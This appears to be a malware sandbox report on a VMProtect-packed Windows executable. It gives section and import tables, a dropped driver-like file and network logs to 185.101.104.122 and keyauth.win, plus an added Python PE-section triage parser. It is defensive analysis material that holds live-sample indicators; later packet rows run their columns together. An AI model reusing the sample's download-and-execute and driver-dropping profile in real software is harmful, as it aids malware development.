.data  | 0xe2000         | 0x1d7a0      | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0               | empty                | 0.0               | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x100000        | 0x780c       | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0               | empty                | 0.0               | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x108000        | 0x1d0        | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0               | empty                | 0.0               | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.vmp0  | 0x109000        | 0x380a2f     | 0x0      | d41d8cd98f00b204e9800998ecf8427e | unknown  | unknown         | unknown              | unknown           | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp1  | 0x48a000        | 0x5c797c     | 0x5c7a00 | 0feb73a506b1582cbc435d4bee9510d6 | unknown  | unknown         | unknown              | unknown           | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0xa52000        | 0xe4         | 0x200    | 9b33d1f688718def130034d085825231 | False    | 0.36328125      | GLS_BINARY_LSB_FIRST | 2.173872001848127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc  | 0xa53000        | 0x1e0        | 0x200    | b3134e158e6baa876b065089e31fa7ba | False    | 0.5390625       | data                 | 4.765699291355714 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
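The section table is the whole on-disk story of this sample: every section the original linker emitted (.text, .rdata, .data, .pdata, _RDATA) and .vmp0 have a raw size of 0x0 and the MD5 of an empty input (d41d8cd98f00b204e9800998ecf8427e), so only .vmp1 (which holds the entry point), .reloc and .rsrc exist in the file, and the code is rebuilt in memory at run time. The dropped 19712-byte file, by contrast, is a PE32+ native-subsystem image with an INIT section, the shape of a kernel-mode driver. The following Python is an added example, not code from the Joe Sandbox report or from the sample: a dependency-free parser for the DOS, COFF, optional and section headers that computes the per-section entropy shown in the table and applies those three triage rules. The two PE images it builds with build_pe() are constructed stand-ins for the packed console EXE and the dropped driver, not the real files.

```python
"""Added example: PE section triage with the heuristics behind the section table.
Not code from the Joe Sandbox report or from the sample; the two images built by
build_pe() below are constructed stand-ins, not the real files."""
import math
import random
import struct

PE32PLUS_MAGIC = 0x20B
IMAGE_SUBSYSTEM_NATIVE = 1        # kernel-mode drivers
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3   # console EXE, as in the report
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for a section with no raw bytes (the report's 'empty' rows)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _machine, nsect, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    subsystem = struct.unpack_from("<H", image, opt + 68)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i                         # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        flags = struct.unpack_from("<I", image, off + 36)[0]  # Characteristics
        raw = image[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize,
                         "entropy": shannon_entropy(raw), "flags": flags})
    return {"pe32plus": magic == PE32PLUS_MAGIC, "subsystem": subsystem, "sections": sections}


def triage(pe: dict) -> list:
    """The three rules an analyst applies to the section table."""
    findings = []
    names = [s["name"] for s in pe["sections"]]
    for s in pe["sections"]:
        executable = s["flags"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
        if executable and s["rawsize"] == 0 and s["vsize"] > 0:
            findings.append(f"{s['name']}: executable, {s['vsize']:#x} bytes virtual but 0 on disk (unpacked at runtime)")
        if s["name"].startswith(".vmp"):
            findings.append(f"{s['name']}: VMProtect section, entropy {s['entropy']:.2f} bits/byte")
    if pe["subsystem"] == IMAGE_SUBSYSTEM_NATIVE and "INIT" in names:
        findings.append("native subsystem with INIT section: kernel-mode driver image")
    return findings


def build_pe(subsystem: int, sections: list) -> bytes:
    """Constructed minimal PE32+ for the demo: headers plus raw section bytes, nothing loadable."""
    sect_align, file_align, headers_size, e_lfanew, opt_size = 0x1000, 0x200, 0x400, 0x40, 240
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<Q", opt, 24, 0x140000000)            # ImageBase
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<I", opt, 60, headers_size)            # SizeOfHeaders
    struct.pack_into("<H", opt, 68, subsystem)
    struct.pack_into("<I", opt, 108, 16)                     # NumberOfRvaAndSizes
    hdrs, body, va, rawptr = bytearray(), bytearray(), sect_align, headers_size
    for name, vsize, data, flags in sections:
        rawsize = -(-len(data) // file_align) * file_align   # round up to FileAlignment
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, va,
                            rawsize, rawptr if rawsize else 0, 0, 0, 0, 0, flags)
        body += data.ljust(rawsize, b"\0")
        va += -(-max(vsize, rawsize) // sect_align) * sect_align
        rawptr += rawsize
    return bytes((dos + b"PE\0\0" + coff + bytes(opt) + hdrs).ljust(headers_size, b"\0") + body)


RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
_rng = random.Random(1)
_packed = bytes(_rng.getrandbits(8) for _ in range(4096))   # constructed stand-in for VMProtect output
PACKED_SAMPLE = build_pe(IMAGE_SUBSYSTEM_WINDOWS_CUI, [
    (".text", 0xB9970, b"", RX),                             # virtual size from the table, nothing on disk
    (".vmp1", len(_packed), _packed, RX),
])
DRIVER_SAMPLE = build_pe(IMAGE_SUBSYSTEM_NATIVE, [           # constructed stand-in for the dropped driver
    (".text", 0x100, b"\x48\x31\xc0\xc3" * 64, RX),
    ("INIT", 0x100, b"\x90" * 0x100, RX | IMAGE_SCN_MEM_DISCARDABLE),
])

if __name__ == "__main__":
    for label, img in (("packed console EXE", PACKED_SAMPLE), ("dropped driver", DRIVER_SAMPLE)):
        print(label)
        for line in triage(parse_pe(img)):
            print("  -", line)
```

Running it against a real file is `triage(parse_pe(open(path, "rb").read()))`; the entropy it prints for .vmp1 is what the report's Entropy column would hold had the tool computed it, and the zero-raw-size rule is what turns the table's row of empty MD5s into the conclusion that the real code only exists after the packer stub has run.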
Name        | RVA      | Size  | Type                                                     | Language | Country       | ZLIB Complexity
RT_MANIFEST | 0xa53058 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English  | United States | 0.5892857142857143
DLL                                  | Import
KERNEL32.dll                         | WaitForSingleObjectEx
USER32.dll                           | LoadCursorA
MSVCP140.dll                         | ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
d3d9.dll                             | Direct3DCreate9Ex
dwmapi.dll                           | DwmExtendFrameIntoClientArea
urlmon.dll                           | URLDownloadToFileA
CRYPT32.dll                          | CertFreeCertificateChainEngine
IMM32.dll                            | ImmReleaseContext
Normaliz.dll                         | IdnToAscii
WLDAP32.dll                          |
WS2_32.dll                           | getsockname
RPCRT4.dll                           | RpcStringFreeA
PSAPI.DLL                            | GetModuleInformation
USERENV.dll                          | UnloadUserProfile
VCRUNTIME140_1.dll                   | __CxxFrameHandler4
VCRUNTIME140.dll                     | __C_specific_handler
api-ms-win-crt-runtime-l1-1-0.dll    | _configure_narrow_argv
api-ms-win-crt-stdio-l1-1-0.dll      | _lseeki64
api-ms-win-crt-heap-l1-1-0.dll       | realloc
api-ms-win-crt-time-l1-1-0.dll       | _gmtime64
api-ms-win-crt-utility-l1-1-0.dll    | qsort
api-ms-win-crt-filesystem-l1-1-0.dll | _stat64
api-ms-win-crt-convert-l1-1-0.dll    | strtoul
api-ms-win-crt-string-l1-1-0.dll     | tolower
api-ms-win-crt-locale-l1-1-0.dll     | _configthreadlocale
api-ms-win-crt-math-l1-1-0.dll       | ceilf
ADVAPI32.dll                         | OpenProcessToken
SHELL32.dll                          | ShellExecuteA
WTSAPI32.dll                         | WTSSendMessageW
KERNEL32.dll                         | GetSystemTimeAsFileTime
USER32.dll                           | GetUserObjectInformationW
KERNEL32.dll                         | LocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
USER32.dll                           | GetProcessWindowStation, GetUserObjectInformationW
Language of compilation system | Country where language is spoken
English                        | United States
Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Oct 25, 2024 08:10:11.578612089 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:11.584229946 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:11.584315062 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:11.584738970 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:11.590161085 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.274135113 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.274187088 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.274224043 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.274425030 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.274425030 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.274425030 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.274604082 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.274640083 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.274828911 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.274828911 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.275073051 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.275108099 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.275142908 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.275156975 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.275156975 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.275233030 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
Oct 25, 2024 08:10:12.275887966 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.275923014 CEST | 80        | 49730     | 185.101.104.122 | 192.168.2.4
Oct 25, 2024 08:10:12.275953054 CEST | 49730     | 80        | 192.168.2.4     | 185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.275988102 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.280404091 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.280436993 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.280472040 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.280591011 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.280591011 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.280591965 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.392649889 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.392667055 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.392683029 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.392879009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.392879009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.393162966 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.393368006 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398094893 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398111105 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398166895 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398207903 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398736954 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398752928 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398814917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398814917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.403346062 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403362036 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403377056 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403630018 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.403630972 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.403953075 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403970003 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.404151917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.404151917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.408663034 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.408678055 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.408751965 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.409183025 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.409198999 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.409219980 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.409394979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.409394979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414031029 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414066076 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414208889 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414208889 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414439917 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414474964 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414496899 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414532900 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419291973 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419346094 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419378996 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419399977 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419399977 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419486046 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419595957 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419787884 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511046886 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511164904 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511226892 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511241913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511241913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511399031 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511584997 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511619091 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511631966 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511655092 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511697054 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511697054 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512186050 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512238979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512646914 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512662888 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512725115 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512726068 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512850046 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512866020 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512896061 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512963057 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513348103 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513362885 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513395071 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513427973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513880014 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513895988 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513930082 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513962984 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.514316082 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.514338970 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.514354944 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.514368057 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.514401913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.514401913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515489101 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.515505075 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.515520096 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.515541077 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515583038 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515583038 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515997887 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516014099 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516067982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516067982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516426086 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516442060 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516474009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516501904 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516992092 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517008066 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517024040 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517041922 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517075062 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517076015 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517875910 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517891884 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517908096 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517930984 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517966986 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517966986 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518799067 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518815994 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518831968 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518846989 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518862009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518862009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518901110 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518902063 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.519658089 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.519675016 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.519690037 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.519716024 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.519716024 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.519751072 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.520545006 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.520560980 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.520576000 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.520597935 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.520632982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.520632982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.521387100 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.521403074 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.521441936 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.521473885 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.552803993 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.552839041 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.552874088 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.553044081 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.553045034 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.553045034 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.629981041 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630017996 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630069017 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630222082 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630223036 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630223036 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630425930 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630474091 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630692959 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630692959 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630724907 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630759001 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630779028 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630804062 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630986929 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631021023 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631182909 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631182909 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631488085 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631520987 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631556034 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631572962 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631572962 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631609917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632230997 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632278919 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632322073 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632323027 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632623911 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632657051 CEST8049730185.101.104.122192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 08:10:24.369735003 CEST | 59628 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 08:10:24.381093979 CEST | 53 | 59628 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 08:10:24.369735003 CEST | 192.168.2.4 | 1.1.1.1 | 0x68e0 | Standard query (0) | keyauth.win | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
